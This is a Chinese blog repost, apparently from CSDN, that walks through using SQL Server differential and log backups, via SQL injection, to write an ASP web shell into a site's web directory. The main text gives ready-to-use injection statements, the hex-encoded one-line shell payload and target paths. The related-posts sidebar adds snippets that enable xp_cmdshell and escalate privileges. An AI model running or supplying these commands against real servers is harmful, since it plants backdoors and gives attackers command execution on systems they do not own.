mysql差异备份提权_复习一下sql server的差异备份

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量82 收藏
点赞数
文章标签: mysql差异备份提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42190623/article/details/113950431
版权

复习一下sql server的差异备份

更新时间:2007年03月08日 00:00:00   作者:

MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!

差异备份的流程大概这样:

1.完整备份一次(保存位置当然可以改)

backup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据

create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面

0x3C25657865637574652872657175657374282261222929253E

就是一句话木马的内容:

如下是网上常见的差异备份代码,思路一样!

===================================================

利用差异备份提高提高backupwebshell的成功率,减少文件大小

步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00为wokao.bak

0x3C25657865637574652872657175657374282261222929253E是

0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明:方法不是我想的,我只是写工具,默认得到shell是

===============================================================

我发现上面代码,有时会无效,而直接用

backup database 库名 to disk = 'c:\ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的!

库名 必须要有效的库名,一般注入工具都可以得到!如果某站过滤 "‘",就要把字符内容转为数值了!

网上还有log增量备份的,我也把他记录一下

=====================================================

另一种log增量备份技术:

';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292

9253EDA)--

';backup log null to disk = '备份路径'--

PS:0x3C2565786563757465287265717565737428226122292

9253EDA 是一句话小马16进制转来的

说到一句话马,还可以有这么几种写法:

a).

b).

c).%>

d).

e).

相关文章

1a1b05c64693fbf380aa1344a7812747.png

都是sql中一些比较实用的sql语句,需要的朋友可以收藏下,方便以后使用。2011-10-10

4f55910a645b073bc4fc65dc10dc14bd.png

在sqlserver中比较常见的关键字有很多,下面小编主要给大家介绍sql server关键字详解,需要了解的朋友可以一起来学习2015-08-08

0ea3c7666119d5615e582f823fb3fad6.png

SQL查询连续号码段的巧妙解法...2007-04-04

4f96a78db829b1556ff16de21e013c7a.png

Merge关键字是一个神奇的DML关键字。它在SQL Server 2008被引入,它能将Insert,Update,Delete简单的并为一句。通过本篇文章给大家介绍sqlserver中merge函数用法详解,感兴趣的朋友一起学习吧2015-11-11

8cc1031babc6aff2319f1c6af8544aa0.png

众所周知,在M$sql中有个绝对是网络安全中的隐患的帐号sa,系统管理员 (sa),默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改。2008-03-03

0c932a99bb7b6f23c937db507070cc7b.png

将查询的结果放到一个新表中去,查询结果可以来源于一个表或多个表。2010-06-06

cca732bf65a93ed2ec0ac80c638460fe.png

本文是小编日常收集整理SqlServer数据库优化经验和注意事项,详细介绍了SQL语句优化的基本原则,包括索引、查询和游标的使用等2015-11-11

2d9f31f2af7b675a3d153d2b7f1035a7.png

本篇文章介绍了,SQL Server的基本功能性语句。需要的朋友参考下2013-04-04

b452cee8ec5cd9e58ab98eba17281e59.png

这篇文章主要介绍了VS2015安装之后加装SQL SERVER2014详细步骤,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2016-12-12

f4838ec7e2d4da28e0b57d4e852dadd4.png

此文章主要向大家讲述的是非动态SQL ServerSQL语句执行动态查询,在实际操作中我尝试在一个存储过程中,来进行传递一系列以逗号划定界限的值,来对结果集进行限制。但是无论什么时候,我在IN子句中使用变量,都会得到错误信息2017-06-06

最新评论

黄子衿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权思路之MSSQL差异备份取系统权限
09-14
看了下面的文章,不是让大家搞破坏,大家可以加强自己服务器的安全性。
MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权
weixin_33743248的博客
11-23 184
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into ...
mysql差异备份提权_提权思路之MSSQL差异备份取系统权限
weixin_34731217的博客
02-02 96
MSsql差异备份获取webshell几乎人人皆知,那么我们可以利用差异备份出来的文件当作恶意代码让系统执行了之后自动提升权限或者添加管理员吗?答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!大家不用想都知道通用地方C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启...
mysql差异备份提权_MSSQL注入时的手工差异备份提权 ___and___ 巧用差异备份DB_OWNER提权...
weixin_29313547的博客
02-08 154
字符型1.恢复当前库;alter database 当前库 set RECOVERY FULL--2.创建表cmd;create table cmd (a p_w_picpath)--3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init--4.插入一句话代码到创建的表cmd;insert into cmd (a) values (...
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
mysql差异备份提权_MSSQL注入提权的一些方法
weixin_26642481的博客
02-08 138
MSSQL注入提权思路:SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)相关SQL语句XP_CMDSHELL:数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--Sp_OACreate:数字型;declare ...
SQL Server 数据库常见提权总结
m0_64481831的博客
03-28 2108
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5667
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
数据库注入提权总结(三)
蚁景网安学院
08-12 4950
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver备份数据库功能生成一个网页小马。
MSSQL注入时的手工差异备份提权
CC's Blog
12-07 3463
转自某个转自别人的博客,最初是谁原创的不清楚了。。。 语句有点问题,修改了下(红色部分,提交一句话内容要进行SQL转码)。。。。 字符型 1.恢复当前库 ;alter database 当前库 set RECOVERY FULL-- 2.创建表cmd ;create table cmd (a image)-- 3.备份当前库到D:\sql ;backup log 当前库 to di
SQL Server 2008 学习笔记
11-12 73
SA提权笔记: EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE; Exec master.dbo.xp_cmdshell 'whoami' Exec master.dbo.xp_cmdshel...
利用log备份得到webshell
liswa 电脑备忘录
03-25 1562
经历:通过 or = 进入,下载回来一个exe文件的报名器,用ultraedit得到其中的mssql连接密码,是dbowner权限 ,可以远程连接,使用xp_dirtree d:/,1,1 得到其web目录,在网上查得一种 log备份得到webshell的技巧alter database xxxx set RECOVERY FULL create table cmd (a ima
mssql差异备份拿shell
一个码农的笔记
03-08 5322
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
一次差异备份拿shell过程
weixin_33724059的博客
01-24 550
0x00 前言 扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。 知识点科普: 1. 目录浏览 目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。 2.差异备份条件 站点绝对路径 具有路径写入权限 具备当前数据库权限 0x01 ...
【数据库提权】- SQL Server提权
weixin_41949487的博客
03-15 1165
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以“低权限”身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通过“手段”让自己变为管理员用户,也可以理解为利用操作系统或软件应用程序中的错误,设计缺陷或配置错误来获得对更高访问权限的行为。 提权又分为系统提权、数据库提权、第三方提权等等,此篇文章就介绍了SQL Serve部分的提权方法,一起来看看吧。 知识补充 系统库 库名 含义 master .
笔记222222222222222222222222222222
最新发布
08-04
笔记222222222222222222222222222222
仿拉钩App小程序.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
华云智慧园区.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
MySqlSqlServer常用语法差异对比分析
"这篇文章主要探讨了MySqlSqlServer在常用用法上的差异,特别是针对存储过程的相关内容,包括标识符限定符、字符串相加、isnull()、getdate()、newid()、@@ROWCOUNT、SCOPE_IDENTITY()、ifelse、declare、游标写法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值